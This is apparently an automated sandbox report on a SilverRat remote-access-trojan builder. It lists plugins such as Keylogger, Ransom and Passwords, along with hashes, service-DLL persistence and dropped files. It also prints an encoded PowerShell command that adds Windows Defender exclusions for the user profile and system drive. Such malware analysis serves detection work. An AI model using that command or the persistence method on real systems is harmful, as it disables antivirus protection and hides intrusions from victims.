Overview
overview
8Static
static
7Bunifu.Licensing.dll
windows10-1703-x64
1Newtonsoft.Json.dll
windows10-1703-x64
1Plugins/Camera.dll
windows10-1703-x64
1Plugins/Chat.dll
windows10-1703-x64
1Plugins/HApps.dll
windows10-1703-x64
1Plugins/HBrowser.dll
windows10-1703-x64
1Plugins/HRDP.dll
windows10-1703-x64
1Plugins/HVNC.dll
windows10-1703-x64
1Plugins/Keylogger.dll
windows10-1703-x64
1Plugins/Manager.dll
windows10-1703-x64
1Plugins/Options.dll
windows10-1703-x64
1Plugins/Op...rm.dll
windows10-1703-x64
1Plugins/Passwords.dll
windows10-1703-x64
1Plugins/RAPP.dll
windows10-1703-x64
1Plugins/RDP.dll
windows10-1703-x64
1Plugins/Ransom.dll
windows10-1703-x64
1Plugins/Re...xy.dll
windows10-1703-x64
1Plugins/ScanNET.dll
windows10-1703-x64
1RestSharp.dll
windows10-1703-x64
1SilverRat.exe
windows10-1703-x64
8System.Buffers.dll
windows10-1703-x64
1System.Col...le.dll
windows10-1703-x64
1System.Memory.dll
windows10-1703-x64
1System.Num...rs.dll
windows10-1703-x64
1bouncycast...to.dll
windows10-1703-x64
1bunifu.ui.....3.dll
windows10-1703-x64
1bunifu.ui....ms.dll
windows10-1703-x64
1cgeoip.dll
windows10-1703-x64
1guna.ui2.dll
windows10-1703-x64
1protobuf-net.core.dll
windows10-1703-x64
1protobuf-net.dll
windows10-1703-x64
1stub.js
windows10-1703-x64
3Analysis
-
max time kernel
127s -
max time network
138s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-05-2024 18:56
Behavioral task
behavioral1
Sample
Bunifu.Licensing.dll
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Newtonsoft.Json.dll
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Plugins/Camera.dll
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
Plugins/Chat.dll
Resource
win10-20240404-en
Behavioral task
behavioral5
Sample
Plugins/HApps.dll
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
Plugins/HBrowser.dll
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
Plugins/HRDP.dll
Resource
win10-20240404-en
Behavioral task
behavioral8
Sample
Plugins/HVNC.dll
Resource
win10-20240404-en
Behavioral task
behavioral9
Sample
Plugins/Keylogger.dll
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
Plugins/Manager.dll
Resource
win10-20240404-en
Behavioral task
behavioral11
Sample
Plugins/Options.dll
Resource
win10-20240404-en
Behavioral task
behavioral12
Sample
Plugins/OptionsForm.dll
Resource
win10-20240404-en
Behavioral task
behavioral13
Sample
Plugins/Passwords.dll
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
Plugins/RAPP.dll
Resource
win10-20240404-en
Behavioral task
behavioral15
Sample
Plugins/RDP.dll
Resource
win10-20240404-en
Behavioral task
behavioral16
Sample
Plugins/Ransom.dll
Resource
win10-20240404-en
Behavioral task
behavioral17
Sample
Plugins/ReverseProxy.dll
Resource
win10-20240404-en
Behavioral task
behavioral18
Sample
Plugins/ScanNET.dll
Resource
win10-20240404-en
Behavioral task
behavioral19
Sample
RestSharp.dll
Resource
win10-20240404-en
Behavioral task
behavioral20
Sample
SilverRat.exe
Resource
win10-20240404-en
Behavioral task
behavioral21
Sample
System.Buffers.dll
Resource
win10-20240404-en
Behavioral task
behavioral22
Sample
System.Collections.Immutable.dll
Resource
win10-20240404-en
Behavioral task
behavioral23
Sample
System.Memory.dll
Resource
win10-20240404-en
Behavioral task
behavioral24
Sample
System.Numerics.Vectors.dll
Resource
win10-20240404-en
Behavioral task
behavioral25
Sample
bouncycastle.crypto.dll
Resource
win10-20240404-en
Behavioral task
behavioral26
Sample
bunifu.ui.winforms.1.5.3.dll
Resource
win10-20240404-en
Behavioral task
behavioral27
Sample
bunifu.ui.winforms.dll
Resource
win10-20240404-en
Behavioral task
behavioral28
Sample
cgeoip.dll
Resource
win10-20240404-en
Behavioral task
behavioral29
Sample
guna.ui2.dll
Resource
win10-20240404-en
Behavioral task
behavioral30
Sample
protobuf-net.core.dll
Resource
win10-20240404-en
Behavioral task
behavioral31
Sample
protobuf-net.dll
Resource
win10-20240404-en
Behavioral task
behavioral32
Sample
stub.js
Resource
win10-20240404-en
General
-
Target
SilverRat.exe
-
Size
31.4MB
-
MD5
117de8f14dc5c65e147710d3051349a9
-
SHA1
5017520d5db39435598e18093ebcd1f02ac59375
-
SHA256
a9bb2702e76300dd4ef6abd1d055b3bd49f59240b585cc33e9322b28fcf9a373
-
SHA512
57c1b7238dfad5f6cf4c520d79d7173dbff36184151c52d2b69104e1e37677fd9e37c63b43dd82cc0d5af183c91de21a15b2759b6770fae68618c9cf4b6ff680
-
SSDEEP
393216:Mk/S9SNoW/KQ4izbTFEAzSN+Wn/d/yzE6Ym4Ez6AyvmtUF5SiXybHl:HKmPxe+Wn/da4I4c6XoQSWyZ
Malware Config
Signatures
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
windowssdk.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ThreadDriversFirewall\Parameters\ServiceDll = "C:\\Windows\\System32\\ThreadDriversFirewall.dll" windowssdk.exe -
Executes dropped EXE 2 IoCs
Processes:
windowssdk.exeSilverRatBuilder.exepid process 832 windowssdk.exe 4212 SilverRatBuilder.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 4160 svchost.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral20/memory/4212-38-0x00000000075C0000-0x000000000760E000-memory.dmp agile_net behavioral20/memory/4212-59-0x0000000009080000-0x00000000091CE000-memory.dmp agile_net -
Processes:
resource yara_rule C:\Windows\windowssdk.exe upx behavioral20/memory/832-7-0x00007FF6E5EA0000-0x00007FF6E6627000-memory.dmp upx behavioral20/memory/832-275-0x00007FF6E5EA0000-0x00007FF6E6627000-memory.dmp upx behavioral20/memory/832-309-0x00007FF6E5EA0000-0x00007FF6E6627000-memory.dmp upx behavioral20/memory/832-320-0x00007FF6E5EA0000-0x00007FF6E6627000-memory.dmp upx -
Drops file in System32 directory 1 IoCs
Processes:
windowssdk.exedescription ioc process File created C:\Windows\System32\ThreadDriversFirewall.dll windowssdk.exe -
Drops file in Windows directory 2 IoCs
Processes:
SilverRat.exewindowssdk.exedescription ioc process File created C:\Windows\windowssdk.exe SilverRat.exe File created C:\Windows\GUDWYKRW.bin windowssdk.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSilverRatBuilder.exepid process 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe 4212 SilverRatBuilder.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeSilverRatBuilder.exedescription pid process Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 4212 SilverRatBuilder.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
SilverRat.exedescription pid process target process PID 4192 wrote to memory of 2264 4192 SilverRat.exe powershell.exe PID 4192 wrote to memory of 2264 4192 SilverRat.exe powershell.exe PID 4192 wrote to memory of 2264 4192 SilverRat.exe powershell.exe PID 4192 wrote to memory of 832 4192 SilverRat.exe windowssdk.exe PID 4192 wrote to memory of 832 4192 SilverRat.exe windowssdk.exe PID 4192 wrote to memory of 4212 4192 SilverRat.exe SilverRatBuilder.exe PID 4192 wrote to memory of 4212 4192 SilverRat.exe SilverRatBuilder.exe PID 4192 wrote to memory of 4212 4192 SilverRat.exe SilverRatBuilder.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SilverRat.exe"C:\Users\Admin\AppData\Local\Temp\SilverRat.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbgBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAdQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYQBlACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Windows\windowssdk.exe"C:\Windows\windowssdk.exe"2⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:832 -
C:\Users\Admin\AppData\Local\Temp\SilverRatBuilder.exe"C:\Users\Admin\AppData\Local\Temp\SilverRatBuilder.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2012
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k threaddriversfirewall -s ThreadDriversFirewall1⤵
- Loads dropped DLL
PID:4160
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25.2MB
MD5d6527f7d5f5152c3f5fff6786e5c1606
SHA1e8da82b4a3d2b6bee04236162e5e46e636310ec6
SHA25679a4605d24d32f992d8e144202e980bb6b52bf8c9925b1498a1da59e50ac51f9
SHA5122b4eb9e66028d263c52b3da42fa3df256cf49cd7a7ebdf7c75da6a2dedfd2c22cb5f2071345b7016cd742539c74a801cad70c612330be79802fa19f860ea2d5f
-
Filesize
4KB
MD5e1a48ec781542ab4f0d3a3368b2a1d05
SHA1a35670f07e5320a1591a55d903b35dcdd1d224a1
SHA256f41d8818774f3ec0bf936e564f50008b46f5e4060edaab3bd72ffa389fb9ef21
SHA512d3e756d8b321d38962a7b36af617d152e9bfd499b31f1630a24ada435715ad81a29ab73e4ab4aa21bbc9029b4177a943303e7df922bf375c2583607cb6f6566a
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6.2MB
MD5e58b6dba9e96f3f015010a7796676153
SHA1bae94a6035fe295f803c12b7dbc85cac2bf120a0
SHA2569e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181
SHA5121b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59
-
Filesize
6.9MB
MD55012248d9b15f575a387921e8963264b
SHA12e7fc5ff0e8ca06eb173db4d7a44401756f982aa
SHA2565777293a7f97869f56ca22438def80619bdfeeea9b4da35f2d0ff38aa7bf8baa
SHA5127aec30119dbbd4db92130323ab195f051d26a213febdf7a77b117e1f40620625ec8fdf937fa88bf4545a4143ad159efce6e4af2e4fb4549831793acc736b308e